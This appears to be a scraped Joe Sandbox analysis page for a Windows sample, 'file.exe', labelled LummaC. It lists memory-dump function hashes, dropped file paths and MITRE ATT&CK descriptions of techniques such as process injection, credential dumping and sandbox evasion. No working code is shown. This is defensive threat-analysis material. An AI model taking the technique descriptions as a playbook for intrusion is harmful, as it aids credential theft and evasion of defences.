Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bd2938f77c974e04e481f045eafc70fdea3afe154c4b224454b328e7d8a6f97
Instruction ID: 4c1a8653edf651eac1b7935c2594a137653020258ddf359f8d8857a3d273d63e
Opcode Fuzzy Hash: 3bd2938f77c974e04e481f045eafc70fdea3afe154c4b224454b328e7d8a6f97
Instruction Fuzzy Hash: A631BFB15093408BD7348F24C4527EBB7F0FFA6364F14992DE4C99B292E7748981CB9A

Function 0263921D Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2180398037.0000000002630000.00000040.00001000.00020000.00000000.sdmp, Offset: 02630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2630000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: db49b2fc0dee055cbccc157374e0e952f96491c382f2667065568335b8c22fca
Instruction ID: e271e2b8e7e1d2603c62ba1fafd522801950f1776bf3ce852d925ee8a3077951
Opcode Fuzzy Hash: db49b2fc0dee055cbccc157374e0e952f96491c382f2667065568335b8c22fca
Instruction Fuzzy Hash: 8911B172341102FFD701AA49CD8AF697779EB99760F15802AFE0A9F689D33658118F60

Function 0005DE70 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d62856af4b83b5f226b7ba95e8a74c503b22545edfcdc35c25a70cc9d68e26bf
Instruction ID: 5195a01591c004494633ebd75e5349e82d30c4c20e554fe60454b51bf5791428
Opcode Fuzzy Hash: d62856af4b83b5f226b7ba95e8a74c503b22545edfcdc35c25a70cc9d68e26bf
Instruction Fuzzy Hash: C7015EF260030157E771BF6494C2B2BB3E9AFA1705F18442EEC049B202EF75ED4987A1

Function 02638F38 Relevance: .1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2180398037.0000000002630000.00000040.00001000.00020000.00000000.sdmp, Offset: 02630000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_2630000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dafb5029215069a15c4cca2d2d4c00b7ef308f56b51cd9eb53b6d43b08ace3b
Instruction ID: 8980da9ead436b9ff6ed000d89c494b1d7721afb51e10a60bb042b8b89310a58
Opcode Fuzzy Hash: 3dafb5029215069a15c4cca2d2d4c00b7ef308f56b51cd9eb53b6d43b08ace3b
Instruction Fuzzy Hash: B71102B2711201AFD3106F1ACD0AF567BB8EBE8760F11802AF91D9F392C73998118F90

Function 0006FAD0 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e49e23dc351de89d15f5305f5c4b26f3aba5fcaf81179bd05513612a1886508a
Instruction ID: 4459a3ef9bdc1d170695177871c42bb5794deb51f3bf93476cae9cf230d48956
Opcode Fuzzy Hash: e49e23dc351de89d15f5305f5c4b26f3aba5fcaf81179bd05513612a1886508a
Instruction Fuzzy Hash: BD11E7B09553915FD784DF25D89056BBAF5EB85348F88AC2CE496E7350D738C501CF06

Function 0005AA60 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.2179370603.0000000000031000.00000040.00000001.01000000.00000008.sdmp, Offset: 00030000, based on PE: true

Associated: 00000007.00000002.2179352646.0000000000030000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.0000000000089000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001CF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001D4000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2179370603.00000000001EF000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_30000_pdf.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 168b3638a15a948fabb7e315130ca59d8dabebd7c0205c89ab5329fef990fbdd
Instruction ID: eca31ca7e3ee499458566879c5556785eeb1e72f73bf706e1a76f00fa9779dce
Opcode Fuzzy Hash: 168b3638a15a948fabb7e315130ca59d8dabebd7c0205c89ab5329fef990fbdd
Instruction Fuzzy Hash: B301BCB090D3849BD3449F65C8A5B1BFFE4AB82314F505D2CF1E68B291CBB98409CF52

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Lipras\pdf.exe

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eedb0q4n.0qa.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hhjbkeew.l3p.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ncja2tgz.kc0.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_r3rtzpbz.xok.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vszyjc0t.wog.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wr5worfc.fny.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yvpfvf34.2ym.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvoo4mpq.v1s.psm1

\Device\ConDrv

Static File Info

General

Windows Analysis Report
file.exe

Function 04C6B4B8 Relevance: 5.3, Strings: 4, Instructions: 258
COMMON

Function 04C6B4C8 Relevance: 5.3, Strings: 4, Instructions: 252
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre